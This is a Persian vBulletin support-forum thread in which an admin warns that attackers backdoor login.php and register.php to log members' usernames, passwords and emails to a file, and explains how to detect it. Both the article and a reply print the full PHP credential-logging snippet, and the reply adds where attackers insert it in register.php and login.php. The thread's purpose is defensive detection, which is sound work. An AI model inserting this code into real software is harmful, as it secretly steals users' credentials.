تبلیغات در اینترنت

تبلیغات در اینترنتگیفت کارت گوگل پلی
نمایش نتایج: از 1 به 6 از 6

مقاله: روش جدید هکر ها برای هک ویبولتین و بدست آوردن پسورد کاربران

    1. روش جدید هکر ها برای هک ویبولتین و بدست آوردن پسورد کاربران »

      روش جدید هکر ها برای هک ویبولتین و بدست آوردن پسورد کاربران

      نگارش: , by (مدیریت کل سایت)
      2013/06/08 05:41 PM
      امتیاز: 

      درود.

      پسورد ها در دیتابیس انجمن ویبولتین شما به صورت پیشرفته ای کد می شوند و عملاً کرک شدن آن ها غیر ممکن است .

      نحوه کد شدن پسورد شما به شرح زیر می باشد :

      کد:
      $hash=MD5(MD5($password)+$salt)
      کرک پسورد ویبولتین از نظر ما و مطمئناً از نظر تمامی هکر ها محال است یا حداقل کرک آن ممکن است چندین سال به طول بینجامد .

      هکر ها اخیراً راه جدیدی را پیش گرفته اند و با استفاده از فایل login.php پسورد ها را در همان مرحله Login در یک فایل Log میکنند .

      به این صورت که به روش های مختلف از سایت شما دسترسی گرفته سپس به عنوان بکدُر درون فایل login.php یک سری کد وارد میکنند که اطلاعات یوزر نیم و پسورد و ایمیل را در یک فایل ذخیره می کند .

      به دلیل سوء استفاده های احتمالی روش آن را ذکر نمیکنیم اما اگر به این موضوع شک کرده اید به شما راه هایی را نشان میدهیم تا فایل لاگین خود را چک کنید .

      روش 1 )

      فایل login.php که موجود در روت ویبولتین شماست را با یک ادیتور مثل ادیتور cPanel باز کنید .

      دنبال $lg_file یاشید ، اگر چنین چیزی را درون فایل login خود دیدید احتمالاً پسورد شما در یک فایل ذخیره می شود .

      فایل مذکور در جلوی این قسمت نوشته شده است مثلاً :

      کد:
      $lg_file = "./images/p.txt";
      نکته : ممکن است فایل های register.php و login.php و index.php و global.php به صورت همزمان آلوده شده باشند .

      روش 2 )

      به بخش عیب شناسی و سپس "بررسی فایل های نسخه فعلی با ورژن فایل" بروید و چک کنید کدام فایل ها در ویبولتین شما تغییر کرده اند و آن ها را مجددا از بسته آپلود کنید .

      دقت داشته باشید این بخش فایل های هک های ویبولتین و موارد مشابه را نیز به عنوان فایل اضافه شناسایی می کند .

      توضیحات و اطلاعات اضافی :

      در صورتی که در فایل global.php ویبولتین شما خط زیر به حالت کامنت در آمده ( یعنی قبل آن // آمده ) باید فایل global.php خود را مجدداً آپلود کنید چون آلوده است :

      کد:
      $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
      در فایل register.php چک کنید چنین خطوطی وجود نداشته باشد :

      کد:
            $lg_username = strtolower($vbulletin->GPC["username"]); 
            $lg_password = $vbulletin->GPC["password"]; 
            $lg_email = $vbulletin->GPC["email"]; 
            $lg_file = "./includes/lg.html"; 
            
            if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) 
              { 
               $fp1 = @fopen($lg_file, "a+"); 
               @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $lg_email . ")\n"); 
               @fclose($fp1); 
               $f = @file($lg_file); 
               $new = array_unique($f); 
               $fp = @fopen($lg_file, "w"); 
                 
               foreach($new as $values) 
                 { 
                  @fputs($fp, $values); 
                 } 
               @fclose($fp); 
              }
      موفق باشید .

      منبع : وی بی ایران
  1. Top | #2

  2. Top | #3

    پیش فرض

    ممنون ، آموزش خوبی بود

    بهتر نیست به هاست بگیم این فایل ها رو مثل config.php مورد حفاظت قرار بده که تغییر نکنه ؟

    مثلا من به HostDl گفتم فایل config.php رو ببنده که نشه توش تغییر ایجاد کرد ، برای login.php و.... تست شده اینکار ؟

    البته فکر نکنم مشکلی هم پیش بیاره ، چون اطلاعات تو دیتابیس ذخیره میشن و فقط برای آپدیت ویبولتین باید دسترسی ها باز بشه

    2 تشکر توسط:


  3. Top | #4
    مدیر بازنشته

    ورژن ویبولتین
    6 ;)
    نوشته ها
    1,725
    میزان امتیاز
    208

    پیش فرض

    درود

    علی جان اگر اشتباه نکنم (اگر اشتباه نکنم) این روش خیلی قدیمی اصلا جدید نیست در واقع باید گفت مال سه چهار سال پیش سال 2009 2010

    چون تا جایی که یادم میاد این روش هک واسه این ورژن ها بود:

    vBulletin 3.6.5
    vBulletin 3.6.8 Patch Level 1 / Patch Level 2
    vBulletin 3.6.9
    vBulletin 3.6.10
    vBulletin 3.7.0
    vBulletin 3.7.3 PL1
    vBulletin 3.8.X

    در واقع رو ورژن های قدیمی این روَ تست شده بود و کاملا قدیمی

    خب مسلما گروهی که میاد چیزی مثل وی بی مینویسه همه جوانب رو در نظر میگیره ولی خب از دید همین آموزش هم بخوایم به قضیه نگاه کنیم این کد:

    کد:
    $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
    اصلا تو فایل global.php وی بی 4.2 نیست که بخوایم کامنتش کنیم

    یا مثلا این کد:

    کد:
          $lg_username = strtolower($vbulletin->GPC["username"]); 
          $lg_password = $vbulletin->GPC["password"]; 
          $lg_email = $vbulletin->GPC["email"]; 
          $lg_file = "./includes/lg.html"; 
          
          if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) 
            { 
             $fp1 = @fopen($lg_file, "a+"); 
             @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $lg_email . ")\n"); 
             @fclose($fp1); 
             $f = @file($lg_file); 
             $new = array_unique($f); 
             $fp = @fopen($lg_file, "w"); 
               
             foreach($new as $values) 
               { 
                @fputs($fp, $values); 
               } 
             @fclose($fp); 
            }
    که باید در فایل register.php قرار بگیره باید زیر این کد قرار بگیره:

    کد:
    $show[\'errors\'] = false;
    (ap####. line 377)
    که موجود نیست الته کد بالا رو خیلی باید دقت کنی چون اگر بخوای تو وی بی 4.2 استفاده کنی اگر حتی یک نقطه اشتباه بزاریم موجب ارور میشه و فاتحه

    که البته کد بالا واسه موقعی هست که بخوایم هر کی ثبت نام کرد مستقیم لاگ بشه

    برای لاگ شدن پسورد افراد فعلی یک کد تو همین مایه ها باد زیر این کد تو فایل login.php بزاریم:

    کد:
    process_new_login
    که باز هم موجب ارور میشه

    فایل index.php که دو نوع کد مربوط به همین آموزش واسش هست : 1- اینکه اگر یکی از کاربرا تیک گزینه ذخیره سازی پسورد رو زده باشن خودکار log out کنه طرفو و 2- کلیه کاربر ها به طور خودکار log out بشن

    در واقع تمام این کد ها رو وی بی 4.2 بیشتر موجب ارور میشه و یا اصلا کد مورد نظر موجود نیست


    قبلا طریقه کد گزاری فایل هاش رو تو یک سایت دیده بودم ولی واسه هکش بود نه امنیت که

    سپاس از اینکه واسه امنیت زحمت میکشید

    خب حالا نظر خودت چیه خودت تست کردی مطمئن هستی رو 4.2 کار میده؟

  4. Top | #5
    کاربر سایت

    ورژن ویبولتین
    5.0.0
    نوشته ها
    5
    میزان امتیاز
    0

    پیش فرض

    سلام ! خسته نباشید ! امیدوارم حالتون خوب باشه ! ببخشید انجمن من هک شده توسط ی فرد ناشناس و واقعا الان نمیدونم باید چیکار کنم ! میشه بهم کمک کنید تا دوباره پس بگیرمش ؟ ازتون ممنون میشم ! اینم آدرس انجمنم که هک شده ! خواهش میکنم در صورتی که میتونید بهم کمک کنید زود باخبرم کنید ! خیلی ممنون میشم ازتون
    http://ham-nafas.ir/forum/forum.php

  5. Top | #6
    کاربر سایت

    ورژن ویبولتین
    4.2
    نوشته ها
    3,054
    میزان امتیاز
    363

    پیش فرض

    دوست عزیز تاپیک های قدیمی رو بالا نیارید
    تاپیک جدا بزنید

    کاربر مقابل از T!G3R بابت این پست مفید تشکر کرده است:


اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

کسانی که این مقاله را دیده اند از این مقاله ها نیز بازدید کرده اند

  1. اموزش تغییر پسورد ویبی از هاست
    توسط lord.arash در انجمن پرسش و پاسخ
    پاسخ: 5
    آخرين نوشته: 2013/02/21, 11:17 PM
  2. phpBB3Auth - مهاجرت نام های کاربری + پسورد از phpBB3 به ویبولتین 4
    توسط VBIran در انجمن آموزش های وی بولتین
    پاسخ: 2
    آخرين نوشته: 2012/12/12, 12:29 PM
  3. پاسخ: 1
    آخرين نوشته: 2012/12/12, 12:01 PM
  4. آیا پسورد ویبولتین قابل کرک هست
    توسط sasan2 در انجمن پرسش و پاسخ
    پاسخ: 2
    آخرين نوشته: 2012/02/04, 07:11 PM
  5. پاسخ: 2
    آخرين نوشته: 2011/02/06, 09:55 PM

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •